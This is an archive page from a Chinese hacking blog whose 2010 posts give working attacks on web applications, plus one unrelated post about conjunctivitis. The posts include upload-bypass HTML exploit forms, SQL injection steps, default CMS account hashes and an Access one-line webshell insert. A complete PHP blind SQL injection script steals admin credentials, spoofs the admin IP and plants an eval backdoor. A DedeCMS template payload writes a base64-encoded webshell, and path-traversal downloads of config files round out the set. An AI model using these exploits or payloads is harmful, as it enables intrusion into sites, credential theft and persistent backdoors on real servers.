浏览模式: 标准 | 列表2010年09月的文章

无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞

Submitted by admin
2010, September 28, 2:58 PM

FROM http://www.st999.cn/blog  BY 流浪的风   2010/9/28

版本:无忧购物系统ASP通用版 V2010.9.17

漏洞:上传漏洞

关键字:Copyright © 2000-2010 gzwynet.com.cn (若有其他更好的关键字,希望能给我留下言)

利用前提:注册用户

漏洞文件:upfile_Other.asp

其中:

<%
if EnableUploadFile="NO" then
 response.write "系统未开放文件上传功能"
else
 if session("AdminName")="" and session("UserName")="" then
  response.Write("请登录后再使用本功能!")

 else
  select case upload_type
   case 0
    call upload_0()  '使用化境无组件上传类
   case else
    'response.write "本系统未开放插件功能"
    'response.end
  end select
 end if
end if
%>

user,就是注册用户,也存在上传权限,其他的几个文件,如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限

那么我们现在就是要利用普通用户的这个可以上传的功能。

首先,注册个用户,如果没找到注册的地方,直接在网址后面输入userreg.asp,

注册并登录,

大小: 87.76 K
尺寸: 500 x 375
浏览: 43 次
点击打开新窗口浏览全图

登录之后不要关闭页面,因为是session验证,现在我们打开这个本地上传页面,

修改action后的地址,并给马儿后面添加一个空格,点击上传就可以,图中红色所示部分就是空格,如图所示

大小: 39.84 K
尺寸: 500 x 99
浏览: 65 次
点击打开新窗口浏览全图大小: 42.28 K
尺寸: 500 x 272
浏览: 55 次
点击打开新窗口浏览全图

复制页面上所示的木马地址,打开即可。

到此,拿到shell,完整结束。

 

==

附上本地上传的这个页面

本地上传漏洞 by 流浪的风.html

Tags: 无忧, 上传

无忧购物系统ASP时尚版上传漏洞

Submitted by admin
2010, September 27, 11:02 PM

FROM http://www.st999.cn/blog

by 流浪的风

关键字:Copyright © 2008-2009 gzwynet.com.cn

目前仅发现时尚版存在这个上传漏洞,明天有时间再看看其他的版本的。

上传利用地址:admin/upLoad_c.asp?a=uploadfile&b=1

利用文件:

<html>
<head>
<title>无忧购物系统ASP时尚版上传漏洞利用程序 BY 流浪的风</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>


<form name="form1" method="post" action="http://www.st999.cn/admin/upLoad_c1.asp"

enctype="multipart/form-data" >
  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
 <TR><td width=20%></td>
 <TD bgcolor=#104A7B width="60%">
 <TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
 <TR>
           <td bgcolor=#eeeeee align=center><font color=red>正在上传文件,请稍候...</font></td>
 </tr>
 </table>
 </td><td width=20%></td>
 </tr>
    </table>
  </div>
  <table width="400" border="0" align="center" cellpadding="0" cellspacing="1"

bordercolorlight="#cccccc" bordercolordark="#CCCCCC" bgcolor="#CCCCCC">
    <tr bgcolor="#CCCCCC">
      <td height="22" align="left" valign="middle" bgcolor="f1f1f1" width="400">&nbsp;文件上传 (允许上

传的文件类型: jpg gif)
        <input type="hidden" name="filepath" value="uploadfile/st.asp;">
        <input type="hidden" name="filelx" value="1">
        <input type="hidden" name="EditName" value="">
        <input type="hidden" name="FormName" value="">
        <input type="hidden" name="act" value="uploadfile">
      </td>
    </tr>
    <tr align="center" valign="middle">
      <td width="400" height="80" align="left" bgcolor="#FFFFFF" id="upid"> 选择文件:
        <input type="file" name="file1" style="width:300'" class="tx1" value="">
      </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
      <td bgcolor="#eeeeee" height="24" width="400">
        <input type="submit" name="Submit" value="· 开始上传 ·" class="button"

onclick="javascript:mysub()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

上传一个JPG格式的小马或一句话

上传后的默认地址:admin/uploadfile/st.asp;(文件名)

如图

大小: 11.15 K
尺寸: 500 x 173
浏览: 37 次
点击打开新窗口浏览全图

实际一句话地址:

大小: 9.61 K
尺寸: 397 x 50
浏览: 50 次
点击打开新窗口浏览全图

利用文件:

无忧购物系统asp时尚版上传漏洞利用程序.html

Tags: 无忧, 上传

慧博商城系统V6.0注入漏洞分析

Submitted by admin
2010, September 27, 10:50 PM

 

发布日期:2010-09.23
发布作者:m4r10
影响版本:慧博商城系统V6.0

漏洞类型:注入漏洞
漏洞描述:慧博商城系统V6.0未经过严格过滤,导致SQL注入漏洞。

漏洞分析:product_inc.asp、checkSQL.asp

  1. product_inc.asp:  

  2.  

  3. Id = Trim(Request.QueryString("id"))  

  4. If Id="" then  

  5. Response.Write("<script language='javascript'>alert('该商品不存在!');history.go(-1);</script>")  

  6. Response.End  

  7. End If  

仅仅过滤了前后空格,之后文件中调用了checkSQL.asp通用防注入。

checkSQL.asp:

第6行:

  1. Fy_Url=Request.ServerVariables("QUERY_STRING") 

这个不多说了,大牛们多年前就对此通用防注入进行了研究。下面直接给出利用过程

 

漏洞利用:

http://URL/product.asp?%69d=1 扔进注入工具里直接跑即可

注:6.0以后版本加入了CNum函数进行了IsNumeric判断与CLng转换过滤了此处注入

Tags: 慧博

ecshop后台拿shell的又一种方法

Submitted by admin
2010, September 27, 9:14 PM

作者:龙儿心[B.H.S.T]

看一个echsop的后台,版本未知。
网上流传的方法都测试了无用,可能是我没找全,无奈只好自己看下后台,发现此方法。
进入后台-系统设置-Flash播放器管理 看图
大小: 34.12 K
尺寸: 500 x 123
浏览: 230 次
点击打开新窗口浏览全图

可以上传任意文件。
结束

Tags: ecshop

一个后台拿shell的笔记

Submitted by admin
2010, September 27, 10:56 AM

经过Fung兄弟的提示和说明,终于让我搞明白了,有时蠢起来真的是无可救药的,笔记一下,以免备忘!

来到access修改工具这里,大小: 3.37 K
尺寸: 170 x 40
浏览: 43 次
点击打开新窗口浏览全图,创建一个.asp的数据库

执行以下命令

create table hack(cmd image);

insert into hack (cmd) values ('┼癥污爠煥敵瑳∨≡┩>');

大小: 37.7 K
尺寸: 500 x 363
浏览: 43 次
点击打开新窗口浏览全图

不用再导出啦

这样就可以了

果然简单的要命啊

当时就是想不起来

嘿嘿

凡诺企业网站管理系统fckeditor拿shell

Submitted by admin
2010, September 24, 8:48 PM

刚刚不小心看到了凡诺企业管理系统,竟然发现也存在fckeditor上传漏洞,

笔记一下,也许以后会用到。

关键字:

版权所有 2008-2010 凡诺网络

or

程序开发:凡诺网络

 

fckeditor编辑器地址

http://www.st999.cn/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp

至于怎么利用,大家都知道滴。。。

 

Tags: 凡诺

dedecms默认的注册用户

Submitted by admin
2010, September 24, 2:29 PM

RT INTO `dede_member` (`mid`, `mtype`, `userid`,
'个人', 'tianya', 'fcea920f7412b5da7be0cf42b8c93759',
'个人', 'wind', 'e10adc3949ba59abbe56e057f20f883e',
'个人', 'like', 'e10adc3949ba59abbe56e057f20f883e', '
'个人', 'yuejie', 'e10adc3949ba59abbe56e057f20f883e',
'个人', '沙羡', 'e10adc3949ba59abbe56e057f20f883e',
'个人', '尐湶細蓅', 'e10adc3949ba59abbe56e057f20f883e'

 

==

关闭注册时可以试试这几个用户

Tags: dedecms, dede

老Y文章管理系统 v2.5 sp2 SQL注射&Cookies欺骗漏洞

Submitted by admin
2010, September 23, 9:07 AM

作者:My5t3ry

老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞,导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当,导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。

漏洞测试exp:
 

<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(
"\n--+++============================================================+++--".
"\n--+++==== ".base64_decode("wM9ZzsTVwrncwO3Ptc2zdjIuNXNwMiBCbGluZCBTUUwgSW5qZWN0aW9uIEV4cGxvaXQ=")." ====+++--".
"\n--+++============================================================+++--".
"\n\n[+] Author : My5t3ry".
"\n[+] Team : http://www.t00ls.net".
"\n[+] Blog : http://www.bksec.net".
"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /".
"\n\n");
}

function query($pos, $chr, $chs)
{
switch ($chs){
case 1:
$query = "admin' or 1=1 and (select asc(mid(Admin_Name,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 2:
$query = "admin' or 1=1 and (select asc(mid(Admin_Pass,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 3:
$query = "admin' or 1=1 and (select len(Admin_Name) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
case 4:
$query = "admin' or 1=1 and (select asc(mid(Admin_IP,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 5:
$query = "admin' or 1=1 and (select len(Admin_IP) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
}
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "Username=".query($pos, $chr, $chs)."&PassWord=aaaaaa&Submit=%B5%C7%C2%BC";
$message = "POST ".$path."User/Userlogin.asp?action=login HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Cookie: ASPSESSIONIDSSCTBRDD=ILJJFNOABJJHHDMPDBAEJIGC\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

function crkusername($hostname, $path, $chs)
{
global $length,$user;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$user .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
global $pass;
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 18)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$pass .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function lengthcolumns($hostname, $path, $chs)
{
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$exit = 1;
$length = $pos;
}
else
$pos++;
if($pos==20)
exit("\r\n[+] Exploit Failed.\r\n");
}
return $length;
}


function crkadminip($hostname, $path, $chs)
{
global $iplength,$adminip;
$key = "1234567890.";
$chr = 0;
$pos = 1;
echo "[+] adminip: ";
while ($pos <= $iplength)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$adminip .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function getshell($hostname, $path, $user, $pass, $adminip)
{
$conn = fsockopen($hostname, 80);

if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "d_name=user&d_initmode=EDIT&d_fixwidth=&d_skin=light1&d_width=500&d_height=300&d_stateflag=1&d_sbedit=1&d_sbview=1&d_detectfromword=1&d_autoremote=0&d_showborder=0&d_entermode=1&d_areacssmode=0&d_memo=500px%BF%ED%B6%C8%BD%E7%C3%E6%CF%C2%B5%C4%D7%EE%BC%F2%B9%A4%BE%DF%C0%B8%B0%B4%C5%A5%2C%CA%CA%BA%CF%D3%DA%D3%CA%BC%FE%CF%B5%CD%B3%C1%F4%D1%D4%CF%B5%CD%B3%B5%C8%D6%BB%D0%E8%D7%EE%BC%F2%B5%A5%B9%A6%C4%DC%B5%C4%D3%A6%D3%C3&d_uploadobject=0&d_autodir=2&d_allowbrowse=0&d_cusdirflag=0&d_baseurl=1&d_uploaddir=..%2Fuploadfiles%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%22%3Aeval%28request%28%22my%22%29%29%27&d_imagesize=0&d_flashext=swf&d_flashsize=0&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=0&d_fileext=rar%7Czip%7Cpdf%7Cdoc%7Cxls%7Cppt%7Cchm%7Chlp&d_filesize=0&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=0&d_localext=gif%7Cjpg%7Cbmp%7Cwmz%7Cpng&d_localsize=0&d_sltsyobject=0&d_sltsyext=jpg%7Cjpeg&d_sltflag=0&d_sltminsize=300&d_sltoksize=120&d_sywzflag=0&d_sywzminwidth=100&d_sywzminheight=100&d_sytext=%B0%E6%C8%A8%CB%F9%D3%D0...&d_syfontcolor=000000&d_syshadowcolor=FFFFFF&d_syshadowoffset=1&d_syfontsize=12&d_syfontname=%CB%CE%CC%E5&d_sywzposition=1&d_sywzpaddingh=5&d_sywzpaddingv=5&d_sywztextwidth=66&d_sywztextheight=17&d_sytpflag=0&d_sytpminwidth=100&d_sytpminheight=100&d_sytpposition=1&d_sytppaddingh=5&d_sytppaddingv=5&d_sypicpath=&d_sytpopacity=1&d_sytpimagewidth=88&d_sytpimageheight=31";

$message = "POST ".$path."Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "X-FORWARDED-FOR: ".$adminip."\r\n";
$message .= "Cookie: ASPSESSIONIDCADSSCQQ=OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin=UserName=".$user."&UserPass=".$pass."&UserID=1\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] Len(username): ";
$length = lengthcolumns($hostname, $path, 3);
echo $length."\n";
echo "[+] Len(adminip): ";
$iplength = lengthcolumns($hostname, $path, 5);
echo $iplength."\n";
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
crkadminip($hostname, $path, 4);
$reply = getshell($hostname, $path, $user, $pass, $adminip);
if(eregi(chr(209).chr(249).chr(202).chr(189).chr(208).chr(222).chr(184).chr(196).chr(179).chr(201).chr(185).chr(166),$reply))
{
echo "[+] Exploit finished.\r\n";
echo "[+] shell:http://".$hostname."/Editor/asp/config.asp?my=response.write(now())\r\n";
}
else
{
echo "[-] Exploit failed.\r\n";
}
?>

关于漏洞分析这里就先不写了,有一点需要注意的是获得webshell后记得到/Editor/asp/config.asp删除写进去的

|":eval(request("my"))'

[localfile=1]

 

Tags: 老y

dede织梦的又一个代码执行0day

Submitted by admin
2010, September 23, 8:29 AM

作者:toby57
博客:http://hi.baidu.com/toby57
作者潜伏于论坛多年,不发帖,只能代为转发了。PHP牛人...

因为鸡肋,所以发出来。
说下利用方法:注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。
生成的解析文件内容如下:

大小: 24.17 K
尺寸: 437 x 192
浏览: 61 次
点击打开新窗口浏览全图

成功效果
大小: 112.88 K
尺寸: 500 x 243
浏览: 149 次
点击打开新窗口浏览全图

漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯 ,所以搞搞 下载站之类的差不多了。

 

---a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码:xiao

Tags: dede, dedecms

伪造Referrer

Submitted by admin
2010, September 19, 9:01 PM

下火狐,搜索插件Referrer,安装后在工具那有个选项Referrer,点开就可以伪造Referrer

大小: 49.48 K
尺寸: 500 x 494
浏览: 64 次
点击打开新窗口浏览全图

 

==========

E创政府管理系统通杀0day---修改Referrer

 

说下修改Referrer过程 给和我一样菜鸟的兄弟:
1,Firefox安装插件 refspoof
2,在地址拿输入:http://www.xxx.com/down.asp?FileName=doc/.%./.%./conn.asp.
在spoof出输入http://www.xxx.com/E_ReadNews.asp
3,,点spoof,出现下载

 

 

==t00ls

Tags: referrer

webshell 提权小技巧

Submitted by admin
2010, September 19, 11:31 AM

这篇日志被加密了,请输入密码后查看。

悲惨的我 赶上潮流了--红眼病

Submitted by admin
2010, September 18, 8:32 PM

最近红眼病红遍大江南北

从来不走潮流的我

也迎上了这个潮流 

我老婆和家人都不能避免

郁闷了

各位博友注意身体了

摘录了一些东东:

红眼病多是双眼先后发病,患病早期,病人感到双眼发烫、烧灼、畏光、眼红,自觉眼睛磨痛,像进入沙子般地滚痛难忍,紧接着眼皮红肿、眼眵多、怕光、流泪,早晨起床时,眼皮常被分泌物粘住,不易睁开。有的病人结膜上出现小出血点或出血斑,分泌物呈粘液脓性,有时在睑结膜表面形成一层灰白色假膜,角膜边缘可有灰白色浸润点,严重的可伴有头痛、发热、疲劳、耳前淋巴结肿大等全身症状。

===

 

 (1)初起时,眼睑及结膜肿胀,可用冷敷,每日3次,每次20分钟。当一眼患红眼,另一眼尚未感染时,应防止健眼亦受传染,在冲洗或滴眼药时,应将头偏向患侧,睡觉时头也应偏向患侧,以防分泌物流入健眼。 
    (2)分泌物增多时,每日用生理盐水或温开水冲洗眼睛3~4次,将眼内分泌物清洗干净。应注意:患红眼病时切忌包盖眼,因为包盖眼后,眼睛里的温度增高,有利于病菌生长、繁殖,分泌物不易排出,反而使炎症加重。
   (3)眼部可滴0.25%氯霉素或其他消炎眼药水,每2小时一次,临睡前涂用消炎眼膏。有人在患红眼病时,要求医生给打消炎针来治疗,其实没这必要,消炎针对红眼病所起的作用很小。如果婴幼儿红眼较严重,而滴眼药又比较困难时,可口服磺胺乳剂等。


教你几招“防红术”

    在这种红眼热浪袭击的日子,怎样才能保证不被“红眼”缠上身呢?眼科医生说,首先要做好预防工作,必须以预防为主。
    首先,做到不接触患者用过的洗脸用具、手帕及治疗使用过的医疗器具。一旦与病人接触后必须洗手消毒以防交叉感染,并且最好不要帮红眼病人滴药或是使用他们的药水;游泳前后最好能滴一两滴抗菌素眼药水,可有效预防“红眼病”。
    而预防红眼病的关键是注意个人卫生,一旦发现病人,应立即切断传播途径 。医生告诫红眼病患者,为了他人的安全,最好不要再工作,因为一旦坚持在办公室工作,这就会使整个办公室人员都容易被感染。而患者也应自觉不到公共场所或与他人接触。
    同时医生提醒市民最好不要到处串门,尽量减少聚会、外出就餐,防止细菌传染。在接触过诸如公车扶手等类似的传播广泛的设施之后,一定要勤洗手。不要用餐厅的毛巾擦脸。要提倡流水洗手,不要用手揉眼,在红眼病等传染病高发季节,尽量不游泳,以防经污染的水进入眼中引起炎症。
    必要时要配备一些预防的药水如氯霉素等。

Records:28123